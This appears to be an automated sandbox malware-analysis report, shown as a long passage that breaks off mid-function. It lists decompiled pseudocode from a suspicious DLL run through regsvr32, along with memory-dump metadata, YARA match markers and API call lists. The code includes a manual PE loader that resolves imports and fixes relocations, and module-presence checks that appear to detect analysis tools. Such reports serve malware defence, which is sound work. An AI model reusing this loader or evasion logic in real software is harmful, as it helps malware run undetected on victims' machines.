                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                                          • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                          				char _v516;
                                          				char _v556;
                                          				char _v564;
                                          				char _v568;
                                          				char _v572;
                                          				char _v576;
                                          				intOrPtr _v580;
                                          				char _v588;
                                          				signed int _v596;
                                          				intOrPtr _v602;
                                          				intOrPtr _v604;
                                          				char _v608;
                                          				CHAR* _v612;
                                          				CHAR* _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				char _v636;
                                          				intOrPtr _t119;
                                          				signed int _t122;
                                          				CHAR* _t124;
                                          				intOrPtr _t125;
                                          				CHAR* _t127;
                                          				WCHAR* _t130;
                                          				intOrPtr _t133;
                                          				intOrPtr _t137;
                                          				WCHAR* _t138;
                                          				intOrPtr _t142;
                                          				WCHAR* _t143;
                                          				CHAR* _t144;
                                          				intOrPtr _t145;
                                          				intOrPtr _t150;
                                          				intOrPtr _t153;
                                          				WCHAR* _t154;
                                          				signed int _t159;
                                          				WCHAR* _t160;
                                          				intOrPtr _t163;
                                          				intOrPtr _t165;
                                          				intOrPtr _t166;
                                          				intOrPtr _t170;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				intOrPtr _t182;
                                          				WCHAR* _t184;
                                          				char _t186;
                                          				WCHAR* _t188;
                                          				intOrPtr _t200;
                                          				intOrPtr _t211;
                                          				signed int _t215;
                                          				char _t220;
                                          				WCHAR* _t231;
                                          				intOrPtr _t235;
                                          				intOrPtr _t238;
                                          				intOrPtr _t239;
                                          				intOrPtr _t246;
                                          				signed int _t248;
                                          				WCHAR* _t249;
                                          				CHAR* _t250;
                                          				intOrPtr _t262;
                                          				void* _t271;
                                          				intOrPtr _t272;
                                          				signed int _t277;
                                          				void* _t278;
                                          				intOrPtr _t280;
                                          				signed int _t282;
                                          				void* _t298;
                                          				void* _t299;
                                          				intOrPtr _t305;
                                          				CHAR* _t326;
                                          				void* _t328;
                                          				WCHAR* _t329;
                                          				intOrPtr _t331;
                                          				WCHAR* _t333;
                                          				signed int _t335;
                                          				intOrPtr* _t337;
                                          				void* _t338;
                                          				void* _t339;
                                          				void* _t353;
                                          
                                          				_t353 = __fp0;
                                          				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                          				_t119 =  *0x1001e688; // 0x2de0590
                                          				_v620 = _v620 & 0x00000000;
                                          				_t328 = __ecx;
                                          				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                          					L7:
                                          					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                                          					E1000A86D( &_v556, _t14, _t351);
                                          					_t298 = 0x64;
                                          					_t122 = E1000A471( &_v556, _t298);
                                          					 *0x1001e748 = _t122;
                                          					if(_t122 != 0) {
                                          						_push(0x4e5);
                                          						_t299 = 0x10;
                                          						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                                          						 *_t337 = 0x610;
                                          						_t124 = E100095E1(0x1001b9cc);
                                          						_push(0);
                                          						_push(_t124);
                                          						_v612 = _t124;
                                          						_t125 =  *0x1001e688; // 0x2de0590
                                          						_t127 = E100092E5(_t125 + 0x228);
                                          						_t338 = _t337 + 0xc;
                                          						_v616 = _t127;
                                          						E100085D5( &_v612);
                                          						_t130 = E1000B269(_t127);
                                          						_t246 = 3;
                                          						__eflags = _t130;
                                          						if(_t130 != 0) {
                                          							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                          							 *_t328 = _t246;
                                          						}
                                          						E1000861A( &_v616, 0xfffffffe);
                                          						_t133 =  *0x1001e688; // 0x2de0590
                                          						_t22 = _t133 + 0x114; // 0x2de06a4
                                          						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                          						_t262 =  *0x1001e688; // 0x2de0590
                                          						_t339 = _t338 + 0x14;
                                          						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                          						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                          							L17:
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							_v572 = _t328;
                                          							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                          							_t137 =  *0x1001e680; // 0x0
                                          							_t138 =  *(_t137 + 8);
                                          							__eflags = _t138;
                                          							if(_t138 != 0) {
                                          								 *_t138(0, 0, 1,  &_v568,  &_v564);
                                          							}
                                          							_v620 = _v620 & 0x00000000;
                                          							E1000E2C6(_t353,  &_v576);
                                          							_pop(_t262);
                                          							_t142 =  *0x1001e6b4; // 0x2e5fc48
                                          							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                          							__eflags = _t143;
                                          							if(_t143 == 0) {
                                          								E1000E2C6(_t353,  &_v588);
                                          								_t235 =  *0x1001e6b4; // 0x2e5fc48
                                          								_pop(_t262);
                                          								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                          							}
                                          							__eflags =  *0x1001e73c;
                                          							if( *0x1001e73c <= 0) {
                                          								goto L36;
                                          							} else {
                                          								_t165 =  *0x1001e680; // 0x0
                                          								__eflags =  *(_t165 + 8);
                                          								if( *(_t165 + 8) != 0) {
                                          									_t231 =  *(_t165 + 0xc);
                                          									__eflags = _t231;
                                          									if(_t231 != 0) {
                                          										 *_t231(_v580);
                                          									}
                                          								}
                                          								_t166 =  *0x1001e688; // 0x2de0590
                                          								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                          								__eflags = _t262 - _t246;
                                          								if(_t262 == _t246) {
                                          									goto L36;
                                          								} else {
                                          									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                          									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                          										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                          										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                          											E100049A5();
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											_t170 =  *0x1001e684; // 0x2e5faa0
                                          											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                          											_t262 = _v602;
                                          											_t248 = 0x3c;
                                          											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                          											_v596 = _t173;
                                          											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                          											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                          											_v624 = _t178;
                                          											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                          											_t182 =  *0x1001e688; // 0x2de0590
                                          											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                                          											_t339 = _t339 + 0xc;
                                          											__eflags = _t184;
                                          											if(_t184 >= 0) {
                                          												_t333 = E10008604(0x1000);
                                          												_v616 = _t333;
                                          												_pop(_t262);
                                          												__eflags = _t333;
                                          												if(_t333 != 0) {
                                          													_t186 = E1000109A(_t262, 0x148);
                                          													_t305 =  *0x1001e688; // 0x2de0590
                                          													_v636 = _t186;
                                          													_push(_t305 + 0x648);
                                          													_push(0xa);
                                          													_push(7);
                                          													_t271 = 2;
                                          													E1000902D(_t271,  &_v572);
                                          													_t272 =  *0x1001e688; // 0x2de0590
                                          													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                          													_t339 = _t339 + 0x18;
                                          													_v632 = _t188;
                                          													__eflags = _t188;
                                          													if(_t188 != 0) {
                                          														_push(_v624 % _t248 & 0x0000ffff);
                                          														_push(_v628 & 0x0000ffff);
                                          														_push(_v596 % _t248 & 0x0000ffff);
                                          														_push(_v620 & 0x0000ffff);
                                          														_push(_v632);
                                          														_push( &_v572);
                                          														_t200 =  *0x1001e688; // 0x2de0590
                                          														__eflags = _t200 + 0x1020;
                                          														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                          														E100085D5( &_v636);
                                          														E1000A911(_t333, 0, 0xbb8, 1);
                                          														E1000861A( &_v632, 0xfffffffe);
                                          														_t339 = _t339 + 0x44;
                                          													}
                                          													E1000861A( &_v616, 0xfffffffe);
                                          													_pop(_t262);
                                          												}
                                          											}
                                          										}
                                          										goto L36;
                                          									}
                                          									__eflags = _t262 - 2;
                                          									if(_t262 != 2) {
                                          										goto L36;
                                          									}
                                          									E100049A5();
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									_t211 =  *0x1001e684; // 0x2e5faa0
                                          									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                          									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                          									_v628 = _t215;
                                          									_t277 = 0x3c;
                                          									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                          									_t249 = E10008604(0x1000);
                                          									_v624 = _t249;
                                          									_pop(_t278);
                                          									__eflags = _t249;
                                          									if(_t249 != 0) {
                                          										_t220 = E100095E1(_t278, 0x32d);
                                          										_t280 =  *0x1001e688; // 0x2de0590
                                          										_push(_t280 + 0x228);
                                          										_t282 = 0x3c;
                                          										_v636 = _t220;
                                          										_push(_v628 % _t282 & 0x0000ffff);
                                          										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                          										E100085D5( &_v636);
                                          										E1000A911(_t249, 0, 0xbb8, 1);
                                          										E1000861A( &_v624, 0xfffffffe);
                                          									}
                                          									goto L41;
                                          								}
                                          							}
                                          						} else {
                                          							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                          							__eflags = _t238 - _t246;
                                          							if(_t238 == _t246) {
                                          								goto L17;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                          							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                          								L36:
                                          								_t144 = E100095E1(_t262, 0x610);
                                          								_push(0);
                                          								_push(_t144);
                                          								_v616 = _t144;
                                          								_t145 =  *0x1001e688; // 0x2de0590
                                          								_t329 = E100092E5(_t145 + 0x228);
                                          								_v612 = _t329;
                                          								__eflags = _t329;
                                          								if(_t329 != 0) {
                                          									_t160 = E1000B269(_t329);
                                          									__eflags = _t160;
                                          									if(_t160 != 0) {
                                          										_t163 =  *0x1001e684; // 0x2e5faa0
                                          										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                          									}
                                          									E1000861A( &_v612, 0xfffffffe);
                                          								}
                                          								E100085D5( &_v616);
                                          								_t150 =  *0x1001e688; // 0x2de0590
                                          								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                                          								_t153 =  *0x1001e688; // 0x2de0590
                                          								_t154 = _t153 + 0x228;
                                          								__eflags = _t154;
                                          								lstrcpynW(_t154,  *0x1001e738, 0x105);
                                          								_t331 =  *0x1001e688; // 0x2de0590
                                          								_t117 = _t331 + 0x228; // 0x2de07b8
                                          								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                                          								E1000861A(0x1001e740, 0xfffffffe);
                                          								E1000861A(0x1001e738, 0xfffffffe);
                                          								L41:
                                          								_t159 = 0;
                                          								__eflags = 0;
                                          								L42:
                                          								return _t159;
                                          							}
                                          							__eflags = _t238 - 2;
                                          							if(_t238 != 2) {
                                          								goto L36;
                                          							}
                                          							goto L17;
                                          						}
                                          					}
                                          					L8:
                                          					_t159 = _t122 | 0xffffffff;
                                          					goto L42;
                                          				}
                                          				_t250 = E100095C7(0x6e2);
                                          				_v616 = _t250;
                                          				_t326 = E100095C7(0x9f5);
                                          				_v612 = _t326;
                                          				if(_t250 != 0 && _t326 != 0) {
                                          					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                          						_v620 = 1;
                                          					}
                                          					E100085C2( &_v616);
                                          					_t122 = E100085C2( &_v612);
                                          					_t351 = _v620;
                                          					if(_v620 != 0) {
                                          						goto L8;
                                          					}
                                          				}
                                          			}
                                          0x10004f94
                                          0x10004f94
                                          0x10004f8e
                                          0x10004f96
                                          0x10004f9b
                                          0x10004fa1
                                          0x10004fa3
                                          0x00000000
                                          0x10004fa9
                                          0x10004fa9
                                          0x10004fad
                                          0x10005082
                                          0x10005088
                                          0x1000508e
                                          0x10005099
                                          0x1000509a
                                          0x1000509b
                                          0x1000509c
                                          0x100050a2
                                          0x100050a7
                                          0x100050ad
                                          0x100050b5
                                          0x100050bb
                                          0x100050be
                                          0x100050cd
                                          0x100050d4
                                          0x100050d7
                                          0x100050e4
                                          0x100050e8
                                          0x100050f5
                                          0x100050fa
                                          0x100050fd
                                          0x100050ff
                                          0x10005110
                                          0x10005112
                                          0x10005116
                                          0x10005117
                                          0x10005119
                                          0x10005124
                                          0x10005129
                                          0x10005136
                                          0x1000513a
                                          0x1000513b
                                          0x1000513d
                                          0x10005145
                                          0x10005146
                                          0x1000514b
                                          0x10005163
                                          0x10005168
                                          0x1000516b
                                          0x1000516f
                                          0x10005171
                                          0x10005184
                                          0x1000518e
                                          0x10005192
                                          0x1000519a
                                          0x1000519b
                                          0x100051a3
                                          0x100051a4
                                          0x100051a9
                                          0x100051b5
                                          0x100051bf
                                          0x100051d1
                                          0x100051dd
                                          0x100051e2
                                          0x100051e2
                                          0x100051ec
                                          0x100051f2
                                          0x100051f2
                                          0x10005119
                                          0x100050ff
                                          0x00000000
                                          0x10005088
                                          0x10004fb3
                                          0x10004fb6
                                          0x00000000
                                          0x00000000
                                          0x10004fbc
                                          0x10004fc7
                                          0x10004fc8
                                          0x10004fc9
                                          0x10004fca
                                          0x10004fd0
                                          0x10004fd5
                                          0x10004fe9
                                          0x10004fee
                                          0x10004ff2
                                          0x10004ffd
                                          0x10005006
                                          0x10005008
                                          0x1000500c
                                          0x1000500d
                                          0x1000500f
                                          0x1000501a
                                          0x10005020
                                          0x10005032
                                          0x10005035
                                          0x10005038
                                          0x10005045
                                          0x1000504d
                                          0x10005057
                                          0x10005069
                                          0x10005075
                                          0x1000507a
                                          0x00000000
                                          0x1000500f
                                          0x10004fa3
                                          0x10004edb
                                          0x10004edb
                                          0x10004ee1
                                          0x10004ee3
                                          0x00000000
                                          0x00000000
                                          0x10004ee5
                                          0x10004ee9
                                          0x100051f3
                                          0x100051f8
                                          0x100051fe
                                          0x10005200
                                          0x10005201
                                          0x10005205
                                          0x10005215
                                          0x1000521a
                                          0x1000521e
                                          0x10005220
                                          0x10005224
                                          0x10005229
                                          0x1000522b
                                          0x1000522d
                                          0x10005233
                                          0x10005233
                                          0x10005240
                                          0x10005246
                                          0x1000524c
                                          0x10005251
                                          0x1000526f
                                          0x10005271
                                          0x1000527d
                                          0x1000527d
                                          0x10005283
                                          0x10005285
                                          0x1000528b
                                          0x1000529d
                                          0x100052a3
                                          0x100052af
                                          0x100052b7
                                          0x100052b7
                                          0x100052b7
                                          0x100052b9
                                          0x100052bf
                                          0x100052bf
                                          0x10004eef
                                          0x10004ef2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x10004ef2
                                          0x10004ed9
                                          0x10004e1d
                                          0x10004e1d
                                          0x00000000
                                          0x10004e1d
                                          0x10004d9b
                                          0x10004da2
                                          0x10004dab
                                          0x10004dad
                                          0x10004db3
                                          0x10004dc4
                                          0x10004dcd
                                          0x10004dcd
                                          0x10004dd9
                                          0x10004de2
                                          0x10004de7
                                          0x10004dec
                                          0x00000000
                                          0x00000000
                                          0x10004dec

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                                          • lstrcpynW.KERNEL32(02DE0158,00000105), ref: 1000526F
                                          • lstrcpynW.KERNEL32(02DE0368,00000105), ref: 10005283
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModulelstrcpyn
                                          • String ID:
                                          • API String ID: 3430401031-0
                                          • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                          • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                                          • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                          • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				signed int _v5;
                                          				signed short _v12;
                                          				intOrPtr* _v16;
                                          				signed int* _v20;
                                          				intOrPtr _v24;
                                          				unsigned int _v28;
                                          				signed short* _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr* _v40;
                                          				signed short* _v44;
                                          				intOrPtr _v48;
                                          				unsigned int _v52;
                                          				intOrPtr _v56;
                                          				_Unknown_base(*)()* _v60;
                                          				signed int _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				unsigned int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				signed int _t149;
                                          				void* _t189;
                                          				signed int _t194;
                                          				signed int _t196;
                                          				intOrPtr _t236;
                                          
                                          				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          				_v24 = _v72;
                                          				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                          				_v56 = _t236;
                                          				if(_t236 == 0) {
                                          					L13:
                                          					while(0 != 0) {
                                          					}
                                          					_push(8);
                                          					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                          						L35:
                                          						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                          						while(0 != 0) {
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_a12 = _v68;
                                          						}
                                          						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                          						return _v68(_a4, 1, _a8);
                                          					}
                                          					_v84 = 0x80000000;
                                          					_t149 = 8;
                                          					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                          						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						if(_v36 == 0) {
                                          							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						}
                                          						if(_v36 != 0) {
                                          							if( *_v16 == 0) {
                                          								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                          							} else {
                                          								_v20 =  *_v16 + _a4;
                                          							}
                                          							_v64 = _v64 & 0x00000000;
                                          							while( *_v20 != 0) {
                                          								if(( *_v20 & _v84) == 0) {
                                          									_v88 =  *_v20 + _a4;
                                          									_v60 = GetProcAddress(_v36, _v88 + 2);
                                          								} else {
                                          									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                          								}
                                          								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                          									 *_v20 = _v60;
                                          								} else {
                                          									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                          								}
                                          								_v20 =  &(_v20[1]);
                                          								_v64 = _v64 + 4;
                                          							}
                                          							_v16 = _v16 + 0x14;
                                          							continue;
                                          						} else {
                                          							_t189 = 0xfffffffd;
                                          							return _t189;
                                          						}
                                          					}
                                          					goto L35;
                                          				}
                                          				_t194 = 8;
                                          				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                          				_t196 = 8;
                                          				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                          				while(0 != 0) {
                                          				}
                                          				while(_v48 > 0) {
                                          					_v28 = _v44[2];
                                          					_v48 = _v48 - _v28;
                                          					_v28 = _v28 - 8;
                                          					_v28 = _v28 >> 1;
                                          					_v32 =  &(_v44[4]);
                                          					_v80 = _a4 +  *_v44;
                                          					_v52 = _v28;
                                          					while(1) {
                                          						_v76 = _v52;
                                          						_v52 = _v52 - 1;
                                          						if(_v76 == 0) {
                                          							break;
                                          						}
                                          						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                          						_v12 =  *_v32 & 0xfff;
                                          						_v40 = (_v12 & 0x0000ffff) + _v80;
                                          						if((_v5 & 0x000000ff) != 3) {
                                          							if((_v5 & 0x000000ff) == 0xa) {
                                          								 *_v40 =  *_v40 + _v56;
                                          							}
                                          						} else {
                                          							 *_v40 =  *_v40 + _v56;
                                          						}
                                          						_v32 =  &(_v32[1]);
                                          					}
                                          					_v44 = _v32;
                                          				}
                                          				goto L13;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                                          • LoadLibraryA.KERNEL32(?), ref: 10012C65
                                          • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 384173800-0
                                          • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                          • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                                          • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                          • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _t13;
                                          				intOrPtr _t15;
                                          				signed int _t16;
                                          				intOrPtr _t17;
                                          				signed int _t18;
                                          				char _t20;
                                          				intOrPtr _t22;
                                          				void* _t23;
                                          				void* _t24;
                                          				intOrPtr _t29;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t43;
                                          				intOrPtr _t48;
                                          				void* _t51;
                                          				signed int _t61;
                                          				signed int _t64;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t61 = __ecx;
                                          				_t41 =  *0x1001e6dc; // 0x0
                                          				_t13 = E1000A4BF(_t41, 0);
                                          				while(_t13 < 0) {
                                          					E1000980C( &_v28);
                                          					_t43 =  *0x1001e6e0; // 0x0
                                          					_t15 =  *0x1001e6e4; // 0x0
                                          					_t41 = _t43 + 0xe10;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t15 - _v24;
                                          					if(__eflags > 0) {
                                          						L9:
                                          						_t16 = 0xfffffffe;
                                          						L13:
                                          						return _t16;
                                          					}
                                          					if(__eflags < 0) {
                                          						L4:
                                          						_t17 =  *0x1001e684; // 0x2e5faa0
                                          						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                                          						__eflags = _t18;
                                          						if(_t18 == 0) {
                                          							break;
                                          						}
                                          						_t35 =  *0x1001e684; // 0x2e5faa0
                                          						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                          						_t41 =  *0x1001e6dc; // 0x0
                                          						__eflags = 0;
                                          						_t13 = E1000A4BF(_t41, 0);
                                          						continue;
                                          					}
                                          					__eflags = _t41 - _v28;
                                          					if(_t41 >= _v28) {
                                          						goto L9;
                                          					}
                                          					goto L4;
                                          				}
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t20 =  *0x1001e6e8; // 0x0
                                          				_v28 = _t20;
                                          				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                                          				_v20 = _t22;
                                          				if(_t22 != 0) {
                                          					_t23 = GetCurrentProcess();
                                          					_t24 = GetCurrentThread();
                                          					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                                          					E1000980C(0x1001e6e0);
                                          					_t64 = E10001A1B( &_v28, E10001226, _t71);
                                          					__eflags = _t64;
                                          					if(_t64 >= 0) {
                                          						_push(0);
                                          						_push( *0x1001e760);
                                          						_t51 = 0x27;
                                          						E10009F06(_t51);
                                          					}
                                          				} else {
                                          					_t64 = _t61 | 0xffffffff;
                                          				}
                                          				_t29 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                                          				_t48 =  *0x1001e6dc; // 0x0
                                          				 *0x1001e6d0 = 0;
                                          				E1000A4DB(_t48);
                                          				E1000861A( &_v24, 0);
                                          				_t16 = _t64;
                                          				goto L13;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                          • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                                          • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                          • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E10001B2D(void* __eflags, void* __fp0) {
                                          				char _v24;
                                          				char _v28;
                                          				void* _t12;
                                          				intOrPtr _t14;
                                          				void* _t15;
                                          				intOrPtr _t16;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				char _t24;
                                          				intOrPtr _t26;
                                          				intOrPtr _t28;
                                          				intOrPtr _t33;
                                          				intOrPtr _t38;
                                          				intOrPtr _t40;
                                          				void* _t41;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				intOrPtr _t51;
                                          				void* _t61;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t38 =  *0x1001e6f4; // 0x0
                                          				_t12 = E1000A4BF(_t38, 0);
                                          				while(_t12 < 0) {
                                          					E1000980C( &_v28);
                                          					_t40 =  *0x1001e700; // 0x0
                                          					_t14 =  *0x1001e704; // 0x0
                                          					_t41 = _t40 + 0x3840;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t14 - _v24;
                                          					if(__eflags > 0) {
                                          						L13:
                                          						_t15 = 0;
                                          					} else {
                                          						if(__eflags < 0) {
                                          							L4:
                                          							_t16 =  *0x1001e684; // 0x2e5faa0
                                          							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                                          							__eflags = _t17;
                                          							if(_t17 == 0) {
                                          								break;
                                          							} else {
                                          								_t33 =  *0x1001e684; // 0x2e5faa0
                                          								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                          								_t51 =  *0x1001e6f4; // 0x0
                                          								__eflags = 0;
                                          								_t12 = E1000A4BF(_t51, 0);
                                          								continue;
                                          							}
                                          						} else {
                                          							__eflags = _t41 - _v28;
                                          							if(_t41 >= _v28) {
                                          								goto L13;
                                          							} else {
                                          								goto L4;
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					return _t15;
                                          				}
                                          				E1000980C(0x1001e700);
                                          				_t19 = GetCurrentProcess();
                                          				_t20 = GetCurrentThread();
                                          				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t24 =  *0x1001e6e8; // 0x0
                                          				_v28 = _t24;
                                          				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                                          				if(_t61 >= 0) {
                                          					_push(0);
                                          					_push( *0x1001e760);
                                          					_t48 = 0x27;
                                          					E10009F06(_t48);
                                          				}
                                          				if(_v24 != 0) {
                                          					E10006890( &_v24);
                                          				}
